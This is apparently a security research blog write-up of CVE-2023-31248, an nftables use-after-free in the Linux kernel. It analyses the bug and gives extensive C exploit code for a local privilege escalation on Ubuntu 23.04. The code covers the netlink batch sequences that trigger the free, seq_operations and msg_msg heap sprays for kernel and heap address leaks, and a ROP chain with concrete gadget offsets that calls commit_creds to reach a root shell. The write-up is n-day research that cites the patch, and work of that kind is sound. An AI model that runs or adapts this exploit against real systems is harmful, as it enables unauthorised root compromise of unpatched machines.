nftables Adventures: CVE-2023-31248 -- Oh How The Turn Tables! [Part 2] - Thu, Sep 28, 2023
TLDR
CVE-2023-31248 is an n-day bug affecting nftables reported by Mingi Cho. The bug report and patch can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=515ad530795c118f012539ed76d02bacfd426d89. Linux kernel versions before 6.2.0-26 generic are vulnerable to this bug. My exploit has been tested on Ubuntu 23.04 (Lunar Lobster), with kernel version 6.2.0-20 generic.
The official version of this writeup can be found at this link: https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation/
nfTable of Contents
- Vulnerability Analysis
- Triggering the Bug
- Obtaining a Use-After-Free
- Obtaining a Kernel Text Leak
- Obtaining a Heap Leak
- Controlling RIP
- Patch Analysis
- Exploit Demo
- Acknowledgements
- References and Credits
Vulnerability Analysis
nft_chain_lookup_byid does not check whether a chain is active (by checking the genmask) when looking up a chain, as seen in the code below:
static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
                                               const struct nft_table *table,
                                               const struct nlattr *nla)
{
    struct nftables_pernet *nft_net = nft_pernet(net);
    u32 id = ntohl(nla_get_be32(nla));
    struct nft_trans *trans;

    list_for_each_entry(trans, &nft_net->commit_list, list) {
        struct nft_chain *chain = trans->ctx.chain;

        if (trans->msg_type == NFT_MSG_NEWCHAIN &&
            chain->table == table &&
            id == nft_trans_chain_id(trans))
            return chain;
    }
    return ERR_PTR(-ENOENT);
}
When adding a rule to a chain referring to its ID, if that chain had been deleted in the same batch, it is possible to refer to an inactive chain. The rule is added successfully, but destroying the deleted chain later fails because the value of chain->use is not 0, resulting in a warning being displayed.
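To make the missing check concrete, here is a minimal userspace sketch of the two lookup behaviours. It is a toy model, not kernel code: struct toy_chain, TOY_GENMASK_NEXT and the function names are all hypothetical, and the generation mask is reduced to a single bit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for struct nft_chain; every name here is hypothetical. */
struct toy_chain {
    uint32_t id;      /* chain ID chosen by userspace inside the batch */
    uint8_t genmask;  /* bit set => inactive in that generation */
};

/* Single generation bit, loosely mirroring the idea of a "next" genmask. */
#define TOY_GENMASK_NEXT 0x2

/* Models NFT_MSG_DELCHAIN inside a batch: the chain is only marked inactive. */
static void delete_in_batch(struct toy_chain *c)
{
    assert(c != NULL);
    c->genmask = TOY_GENMASK_NEXT;
}

/* Vulnerable behaviour: match on the ID only. */
static struct toy_chain *lookup_byid(struct toy_chain *chains, size_t n,
                                     uint32_t id)
{
    for (size_t i = 0; i < n; i++)
        if (chains[i].id == id)
            return &chains[i];
    return NULL;
}

/* Checked behaviour: additionally require the chain to be active. */
static struct toy_chain *lookup_byid_checked(struct toy_chain *chains, size_t n,
                                             uint32_t id, uint8_t genmask)
{
    for (size_t i = 0; i < n; i++)
        if (chains[i].id == id && !(chains[i].genmask & genmask))
            return &chains[i];
    return NULL;
}
```

In this model, a chain deleted earlier in the batch is still returned by lookup_byid, while lookup_byid_checked reports it as not found.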
Triggering the bug with a single batch transaction
To trigger the bug, a batch transaction can be sent comprising the following steps:
- Create a new table “table1” (NFT_MSG_NEWTABLE)
- Create a new chain “chain1” (NFT_MSG_NEWCHAIN)
- Delete “chain1” (NFT_MSG_DELCHAIN)
- Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
- Create a rule inside chain2 referencing chain1. This can be done with a jump or goto expression with the destination chain set to chain1’s chain ID. (NFT_MSG_NEWRULE)
When the new rule is created, the following code path is taken such that the value of chain->use for the destination chain (chain1) is incremented from 0 to 1. This is due to the fact that a new reference to chain1 is created.
nf_tables_newrule
-> nf_tables_newexpr
-> nft_immediate_init
-> nft_data_init
-> nft_verdict_init
As all the actions in the batch transaction are determined to be valid, the batch transaction succeeds. When a valid batch transaction succeeds, nfnetlink_rcv_batch calls the commit operation for nf_tables_subsys, which is nf_tables_commit.
Note that the struct nft_chain chain1 object is not immediately deleted when NFT_MSG_DELCHAIN is received. For each action, a transaction is added to the list, and all the transactions are processed when commit is called. Destruction of deleted objects is then scheduled, and performed by a worker thread asynchronously. The following code path is then taken to destroy and free the chain1 object, which has been marked as inactive:
nf_tables_commit
-> nf_tables_commit_release
-> nf_tables_trans_destroy_work
-> nft_commit_release
-> nf_tables_chain_destroy
However, in this case, when nf_tables_chain_destroy is reached, chain1 is not freed and a warning is displayed. This is because chain1’s chain->use is 1 and not 0 ([6]).
void nf_tables_chain_destroy(struct nft_ctx *ctx)
{
    struct nft_chain *chain = ctx->chain;
    struct nft_hook *hook, *next;

    if (WARN_ON(chain->use > 0)) /* [6] */
        return;

    /* no concurrent access possible anymore */
    nf_tables_chain_free_chain_rules(chain);

    if (nft_is_base_chain(chain)) {
        struct nft_base_chain *basechain = nft_base_chain(chain);

        if (nft_base_chain_netdev(ctx->family, basechain->ops.hooknum)) {
            list_for_each_entry_safe(hook, next,
                                     &basechain->hook_list, list) {
                list_del_rcu(&hook->list);
                kfree_rcu(hook, rcu);
            }
        }
        module_put(basechain->type->owner);
        if (rcu_access_pointer(basechain->stats)) {
            static_branch_dec(&nft_counters_enabled);
            free_percpu(rcu_dereference_raw(basechain->stats));
        }
        kfree(chain->name);
        kfree(chain->udata);
        kfree(basechain);
    } else {
        kfree(chain->name);
        kfree(chain->udata);
        kfree(chain);
    }
}
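The single-batch trigger can be replayed with a small userspace model of the reference counter. This is only a sketch under simplifying assumptions: struct model_chain and the model_* functions are hypothetical names, and a freed flag stands in for the real kfree calls.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Toy model of the fields that matter for the bug; names are hypothetical. */
struct model_chain {
    unsigned int use;  /* references held by jump/goto verdicts */
    bool inactive;     /* set by a DELCHAIN in the batch */
    bool freed;        /* set instead of calling free(), to keep the model safe */
};

/* Models nft_verdict_init taking a reference on the destination chain. */
static void model_verdict_init(struct model_chain *dst)
{
    dst->use++;
}

/* Models nf_tables_chain_destroy: refuse to free while references remain. */
static bool model_chain_destroy(struct model_chain *c)
{
    assert(c != NULL);
    if (c->use > 0) {
        fprintf(stderr, "WARN: chain still has %u reference(s)\n", c->use);
        return false;
    }
    c->freed = true;
    return true;
}

/* Replays NEWCHAIN, DELCHAIN, NEWRULE (goto chain1), then commit. */
static bool model_trigger(struct model_chain *chain1)
{
    chain1->use = 0;                     /* NEWCHAIN: fresh chain */
    chain1->freed = false;
    chain1->inactive = true;             /* DELCHAIN: only marked inactive */
    model_verdict_init(chain1);          /* NEWRULE: lookup by ID still finds it */
    return model_chain_destroy(chain1);  /* commit: deferred destruction */
}
```

Calling model_trigger leaves the chain unfreed with use equal to 1, which corresponds to the warning path at [6].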
Exploitation
Obtaining a Use-After-Free
The first step to writing a successful privilege escalation exploit is obtaining a use-after-free primitive. Essentially, we need to find a way to decrease chain->use of the deleted chain to 0 so that when nf_tables_chain_destroy is called, the chain object is freed. This can be done by exploiting the race condition between the control plane (nf_tables_delrule) and the transaction worker (nf_tables_trans_destroy_work).
To do this, two batch transactions were sent. In the first batch transaction, the following actions were performed:
- Create a new table “test_table” (NFT_MSG_NEWTABLE)
- Create a new chain “chain1” with name “AAAAAAAAAAAAAAAAAAAA” (NFT_MSG_NEWCHAIN). The name of the chain is 20 characters long. This is the chain to be deleted.
- Delete “chain1” (NFT_MSG_DELCHAIN)
- Create a new chain “chain2” (NFT_MSG_NEWCHAIN)
- Create a rule inside “chain2” referencing “chain1” (the chain named “AAAAAAAAAAAAAAAAAAAA”). In the exploit, this was done with an immediate “goto” expression with the destination chain set to the target chain using the chain ID.
// Start nl message 1
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create table
struct nftnl_table *t = build_table(table_name, NFPROTO_IPV4);
family = nftnl_table_get_u32(t, NFTNL_TABLE_FAMILY);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
nftnl_table_free(t);
mnl_nlmsg_batch_next(batch);
// Create chain 1
struct nftnl_chain *c = build_chain(table_name, chain_name, NULL, 0x1234);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Delete chain 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
nftnl_chain_free(c);
mnl_nlmsg_batch_next(batch);
// Create chain 2
struct nftnl_chain *c2 = build_chain(table_name, "chain2", &bp, 10);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c2);
nftnl_chain_free(c2);
mnl_nlmsg_batch_next(batch);
// Create rule pointing to chain 1
struct nftnl_rule *r = build_rule(table_name, "chain2", family, NULL);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
// Add immediate expr to rule
struct nftnl_expr *e = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_CHAIN_ID, 0x1234);
nftnl_rule_add_expr(r, e);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As all the actions in the first batch transaction are valid, commit is called, and the transaction worker which destroys inactive objects is scheduled.
The second batch transaction consists of the following operations:
- Delete the rule referencing the target chain (NFT_MSG_DELRULE)
- Create an invalid rule. In this case, audit_info->type can take values ranging from 0 to 2 inclusive, so 0xff is an invalid value which will cause the batch to fail. [7]
// Start nl message 2
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Delete rule 1
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r);
mnl_nlmsg_batch_next(batch);
// Fail the batch using an invalid rule
struct nftnl_rule *r2 = nftnl_rule_alloc();
nftnl_rule_set_u32(r2, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(r2, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(r2, NFTNL_RULE_CHAIN, "chain2");
struct xt_audit_info *audit_info;
audit_info = malloc(sizeof(struct xt_audit_info));
audit_info->type = 0xff; // [7]
struct nftnl_expr *e2 = nftnl_expr_alloc("target");
nftnl_expr_set_str(e2, NFTNL_EXPR_TG_NAME, "AUDIT");
nftnl_expr_set_u32(e2, NFTNL_EXPR_TG_REV, 0);
nftnl_expr_set_data(e2, NFTNL_EXPR_TG_INFO, audit_info, sizeof(struct xt_audit_info));
nftnl_rule_add_expr(r2, e2);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_rule_nlmsg_build_payload(nlh, r2);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message 2
printf("[+] Sending netlink message 2\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch));
if (ret == -1) {
perror("mnl_socket_sendto");
exit(EXIT_FAILURE);
}
mnl_nlmsg_batch_stop(batch);
As the second batch transaction fails, commit will not be called. However, nftables netlink messages were still passed to nftables, and operations in the control plane will still be performed (they will be aborted at the very end when the batch transaction fails).
As NFT_MSG_DELRULE was passed to nftables, the following code path is taken:
nf_tables_delrule
-> nft_delrule_by_chain
-> nft_delrule
-> nft_rule_expr_deactivate
-> nft_immediate_deactivate
-> nft_data_release
-> nft_verdict_uninit
Specifically, in nft_verdict_uninit, chain->use of the referenced chain (which in this case would be our target chain “AAAAAAAAAAAAAAAAAAAA”) will be decremented from 1 to 0.
static void nft_verdict_uninit(const struct nft_data *data)
{
    struct nft_chain *chain;
    struct nft_rule *rule;

    switch (data->verdict.code) {
    case NFT_JUMP:
    case NFT_GOTO:
        chain = data->verdict.chain;
        chain->use--;
        ...
Essentially, chain->use of the target chain must be decremented to 0 before the transaction worker nf_tables_trans_destroy_work runs, and the transaction worker must run before the failed batch transaction is aborted.
If the rule is marked for deletion before nf_tables_chain_destroy is called, chain->use of the target chain will be 0 when the chain is destroyed, allowing the chain to be freed. As seen in the function code previously, the objects are freed in the order chain->name, chain->udata, and chain. The struct nft_chain object has been freed, but we still have a reference to the freed chain via the rule (which is not actually deleted because the second transaction fails), resulting in a use-after-free. The space that chain, chain->name and chain->udata originally occupied can now be reclaimed with other objects to aid us in our exploitation.
Obtaining a kernel text leak
Before going into how to obtain a leak, it is important to understand how and where the chain, chain->udata and chain->name objects are allocated.
The struct nft_chain object is allocated when nftables receives an NFT_MSG_NEWCHAIN message. In the control plane, nf_tables_newchain calls nf_tables_addchain, which allocates the new chain object in the kmalloc-cg-128 cache. chain->udata and chain->name are allocated in their respective kmalloc-cg caches by nla_memdup and nla_strdup respectively.
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
                              u8 policy, u32 flags,
                              struct netlink_ext_ack *extack)
{
    ...
    chain = kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT);
    if (chain == NULL)
        return -ENOMEM;
    ...
    if (nla[NFTA_CHAIN_NAME]) {
        chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
    } else {
        if (!(flags & NFT_CHAIN_BINDING)) {
            err = -EINVAL;
            goto err_destroy_chain;
        }
        snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
        chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
    }
    ...
    if (nla[NFTA_CHAIN_USERDATA]) {
        chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
        if (chain->udata == NULL) {
            err = -ENOMEM;
            goto err_destroy_chain;
        }
        chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);
    }
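Since the length of the name decides which cache chain->name lands in, a quick way to reason about it is to round the allocation size up to the next kmalloc size class. The helper below is a sketch: kmalloc_bucket and name_bucket are hypothetical names, and the size list assumes a typical x86-64 configuration that has the 96 and 192 byte caches.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Round a request up to the general-purpose kmalloc size class that serves it.
 * The bucket list is an assumption about a typical x86-64 build. */
static size_t kmalloc_bucket(size_t size)
{
    static const size_t buckets[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };

    assert(size > 0);
    for (size_t i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++)
        if (size <= buckets[i])
            return buckets[i];
    return 0; /* larger requests are not served from these caches */
}

/* A duplicated string needs its length plus the terminating NUL byte. */
static size_t name_bucket(const char *name)
{
    return kmalloc_bucket(strlen(name) + 1);
}
```

For the 20-character name used in the exploit, name_bucket returns 32, which matches the kmalloc-cg-32 cache targeted in the next step.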
It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.
To obtain a kernel text leak, struct seq_operations was chosen as the spray object. In kernel version 6.2.0, struct seq_operations is allocated in the kmalloc-cg-32 cache by the function single_open in fs/seq_file.c. This object is well suited for leaking as it contains pointers into kernel text, the first of which is the address of the single_start function.
struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};
struct seq_operations was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].
// Spray seq_operations to fill up kmalloc-cg-32 (chain->name)
printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
for (int i = 0; i < NUM_SEQOPS; i++) {
seqops[i] = open("/proc/self/stat", O_RDONLY); // [8]
if (seqops[i] < 0) {
perror("[!] open");
exit(-1);
}
}
// Get kernel text address leak of single_start and calculate kbase
char kbase_leak[0x10+1];
uint64_t k_single_start = 0; // 0x4b2470 offset
uint64_t kbase = 0;
int err = 0;
printf("[+] Getting leak\n");
// Leak
struct nftnl_rule *rleak = nftnl_rule_alloc();
nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
rseq = seq;
nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rleak);
mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
while (rseq < seq) {
err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
rseq += err == 0;
}
nftnl_rule_free(rleak);
kbase = number - 0x4b2470; // [9]
printf("[+] Kernel base: 0x%llx\n", kbase);
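The arithmetic behind [9] can be sketched in isolation. The helpers below are hypothetical (they are not the leak_cb callback used above): one rebuilds a 64-bit value from the bytes returned as the chain name, and the other subtracts the single_start offset and applies two sanity checks. The 2 MiB alignment check is an assumption about how KASLR places the kernel image, and the offset is specific to the tested kernel build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SINGLE_START_OFFSET 0x4b2470ULL /* from the exploit above; build-specific */

/* Rebuild a pointer from a leaked name string (least significant byte first).
 * Stops at the first NUL byte or after 8 bytes. */
static uint64_t decode_leaked_pointer(const char *name)
{
    uint64_t value = 0;

    for (size_t i = 0; i < 8 && name[i] != '\0'; i++)
        value |= (uint64_t)(unsigned char)name[i] << (8 * i);
    return value;
}

/* Returns 0 and stores the base on success, -1 if the leak looks wrong. */
static int kbase_from_leak(uint64_t leak, uint64_t *kbase)
{
    uint64_t base = leak - SINGLE_START_OFFSET;

    assert(kbase != NULL);
    if ((leak >> 32) != 0xffffffffULL) /* not in the kernel text range */
        return -1;
    if ((base & 0x1fffffULL) != 0)     /* assumed 2 MiB alignment of the base */
        return -1;
    *kbase = base;
    return 0;
}
```

Rejecting an implausible leak early is cheaper than crashing the kernel later with a ROP chain built on a wrong base.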
Obtaining a heap leak
Ideally, to have enough space for our fake struct nft_rule, struct nft_expr and struct nft_expr_ops, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg which contains all our fake objects). However, the least significant byte of a kmalloc-cg-1024 address is always a null byte, and since that byte is stored first in memory, the string read stops immediately. This prevents us from directly printing the address via chain->name.
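A short sketch shows how many bytes of a pointer survive a string read. leakable_bytes is a hypothetical helper, and the example addresses used to exercise it are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Number of pointer bytes a C-string read returns before it hits a zero byte.
 * Bytes are visited least significant first, as they are laid out on x86-64. */
static size_t leakable_bytes(uint64_t ptr)
{
    size_t n = 0;

    while (n < sizeof(ptr) && ((ptr >> (8 * n)) & 0xff) != 0)
        n++;
    assert(n <= sizeof(ptr));
    return n;
}
```

A 1024-byte aligned address such as 0xffff888012345400 yields 0 bytes, whereas an address like 0xffff8880123454c0 can be read in full.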
To circumvent this limitation, we will spray struct msg_msg objects as follows (prev pointers are omitted for simplicity):
In a single message queue, there will be:
- Primary message (size 64) – this will reclaim the free space where chain->name originally was
- Secondary message (size 96)
- Third message (size 1024)
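The queue layout above could be produced along the following lines. This is a sketch rather than the exploit's actual spray code: struct spray_msg, payload_len and queue_three are hypothetical names, and it assumes the struct msg_msg header is 48 bytes, so the payload length is the target slab size minus 48.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define MSG_MSG_HDR 48 /* assumed sizeof(struct msg_msg) on x86-64 */

struct spray_msg {
    long mtype;
    char mtext[1024 - MSG_MSG_HDR];
};

/* Payload length needed for header plus payload to total slab_size bytes. */
static size_t payload_len(size_t slab_size)
{
    assert(slab_size > MSG_MSG_HDR);
    return slab_size - MSG_MSG_HDR;
}

/* Send the primary (64), secondary (96) and third (1024) message to one queue.
 * Messages in the same queue are linked together through their list pointers. */
static int queue_three(int qid)
{
    static const size_t sizes[3] = { 64, 96, 1024 };
    struct spray_msg m;

    for (int i = 0; i < 3; i++) {
        memset(&m, 0, sizeof(m));
        m.mtype = i + 1;                               /* must be positive */
        memset(m.mtext, 'A' + i, payload_len(sizes[i]));
        if (msgsnd(qid, &m, payload_len(sizes[i]), IPC_NOWAIT) < 0)
            return -1;
    }
    return 0;
}
```

A queue for this can be created with msgget(IPC_PRIVATE, IPC_CREAT | 0600). In a real spray the same three sends would be repeated over many queues.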
We will first attempt to leak a kmalloc-cg-96 pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which holds the address of the secondary message. A size of 96 bytes was chosen because kmalloc-cg-96 objects are small, so there is a much lower probability that the last byte of the address is 0x00, which would truncate the leak and cause it to fail.
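To put a rough number on that probability, we can count how many object slots in a slab start at an address whose low byte is zero. The sketch below uses hypothetical names and a simplifying assumption: objects are packed back to back from the start of a page-aligned slab of 4096 bytes.

```c
#include <assert.h>
#include <stddef.h>

struct slot_stats {
    size_t total;          /* object slots in the slab */
    size_t low_byte_zero;  /* slots whose address ends in 0x00 */
};

/* Count slots under the assumption of a page-aligned, tightly packed slab. */
static struct slot_stats count_slots(size_t obj_size, size_t slab_bytes)
{
    struct slot_stats s = { 0, 0 };

    assert(obj_size > 0);
    for (size_t off = 0; off + obj_size <= slab_bytes; off += obj_size) {
        s.total++;
        if ((off & 0xff) == 0)
            s.low_byte_zero++;
    }
    return s;
}
```

Under these assumptions, 6 of the 42 slots of a 96-byte cache end in 0x00 (about 14%), compared with all 4 of 4 slots for 1024-byte objects.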
After obtaining a valid kmalloc-cg-96 heap pointer, we now want to leak the kmalloc-cg-1024 heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024. We also know that the struct nft_chain object (which is now freed) was allocated in kmalloc-cg-128. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the address of the kmalloc-cg-96 pointer + 1 to bypass the null byte. This is shown in the diagram below:
We can now read from chain->name to obtain a kmalloc-cg-1024 pointer.
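Because the read starts one byte into the stored pointer, the leaked string holds bytes 1 to 7 and the missing low byte is known to be zero. Rebuilding the address is then a matter of shifting. The helper below is a hypothetical sketch, and the example value in the note after it is invented.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rebuild a pointer whose low byte is 0x00 from the 7 bytes read at ptr + 1.
 * Returns 0 if fewer than 7 bytes were leaked (another zero byte cut it short). */
static uint64_t rebuild_from_offset_one(const unsigned char *leak, size_t len)
{
    uint64_t value = 0;

    assert(leak != NULL);
    if (len < 7)
        return 0;
    for (size_t i = 0; i < 7; i++)
        value |= (uint64_t)leak[i] << (8 * (i + 1));
    return value; /* byte 0 stays 0x00 by construction */
}
```

For example, the leaked bytes 54 34 12 80 88 ff ff rebuild to 0xffff888012345400. If one of the middle bytes happens to be zero the leak is truncated, and the spray has to be retried.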
Controlling RIP
When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:
nf_tables_newrule
-> nft_table_validate
-> nft_chain_validate
-> expr->ops->validate
When nft_chain_validate is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules in the nft_chain structure to determine which rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.
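The reason this gives control of RIP is that validation ends in an indirect call through a pointer stored in attacker-controlled memory. The following userspace model illustrates the pointer chase with heavily simplified, hypothetical structures (a singly linked rule list and one expression per rule). It is not the kernel's layout.

```c
#include <assert.h>
#include <stddef.h>

struct toy_expr;

struct toy_expr_ops {
    int (*validate)(const struct toy_expr *expr);
};

struct toy_expr {
    const struct toy_expr_ops *ops;
};

struct toy_rule {
    struct toy_rule *next;
    const struct toy_expr *expr;
};

struct toy_chain {
    struct toy_rule *rules;
};

/* Walk chain -> rule -> expr -> ops and call validate, like the path above. */
static int toy_chain_validate(const struct toy_chain *chain)
{
    assert(chain != NULL);
    for (const struct toy_rule *r = chain->rules; r != NULL; r = r->next) {
        if (r->expr->ops->validate == NULL)
            continue;
        int err = r->expr->ops->validate(r->expr);
        if (err < 0)
            return err;
    }
    return 0;
}

/* Stand-in for the first ROP gadget: just records that it was reached. */
static int hijack_hits;

static int attacker_target(const struct toy_expr *expr)
{
    (void)expr;
    hijack_hits++;
    return 0;
}
```

Whoever controls the memory behind the chain decides what the rules list points to, and therefore which function validate resolves to.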
We first free the third message (size 1024) and the fourth message (size 128), which were used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg and spray that as our third message. The fake structures and ROP chain can be seen below:
// Do all the ROP stuff in kmalloc-cg-1024
printf("[+] PHASE 3: ROP\n");
uint64_t fake_rule_addr = kheap_1024 + 0x230;
printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
uint64_t fake_expr_addr = kheap_1024 + 0x260;
printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
// Make a fake rule
memset(&msg_three, 0, sizeof(msg_three));
*(long *)&msg_three.mtype = 0x43;
*(uint8_t *)&msg_three.mtext[0x215] = 0x10;
*(long *)&msg_three.mtext[0x218] = fake_expr_addr;
*(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
// 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
// ROP!!!
*(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
// 0xffffffff810d58be : pop rsp ; pop r15 ; ret
*(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
*(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
*(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
// 0xffffffff81cb0f92 : pop rsi ; ret 0
*(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
*(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6;
// 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
// Jump point after push rax
*(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
*(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
*(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
*(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
*(long *)&msg_three.mtext[0x288] = user_rip;
*(long *)&msg_three.mtext[0x290] = user_cs;
*(long *)&msg_three.mtext[0x298] = user_rflags;
*(long *)&msg_three.mtext[0x2a0] = user_sp;
*(long *)&msg_three.mtext[0x2a8] = user_ss;
// Spray msg_msg of size 1024
for (int i = 0; i < NUM_MSQIDS; i++) {
if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
perror("[!] msg_msg spray failed");
exit(-1);
}
}
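When reading the offsets above, it helps to remember that mtext starts after the struct msg_msg header, so an mtext index and a heap offset differ by the header size. The two helpers below are a hypothetical sketch that assumes a 48-byte header and a message small enough to fit in a single segment.

```c
#include <assert.h>
#include <stdint.h>

#define MSG_MSG_HDR 0x30 /* assumed sizeof(struct msg_msg) on x86-64 */

/* Heap address of mtext[mtext_off] for a message object at msg_addr. */
static uint64_t mtext_to_heap(uint64_t msg_addr, uint64_t mtext_off)
{
    return msg_addr + MSG_MSG_HDR + mtext_off;
}

/* Inverse mapping: which mtext index backs a given heap address. */
static uint64_t heap_to_mtext(uint64_t msg_addr, uint64_t heap_addr)
{
    assert(heap_addr >= msg_addr + MSG_MSG_HDR);
    return heap_addr - msg_addr - MSG_MSG_HDR;
}
```

With this mapping, fake_rule_addr (kheap_1024 + 0x230) corresponds to mtext[0x200], fake_expr_addr (kheap_1024 + 0x260) to mtext[0x230], and the value kheap_1024 + 0x3a0 + 48 + 0x70 loaded into rsi makes rsi - 0x70 point at mtext[0x3a0].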
We then spray a fourth struct msg_msg which will act as our fake chain. Shown below is a summary of the objects involved:
To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!
As before, if you would like a graphical representation of the entire exploit chain, check out these slides:
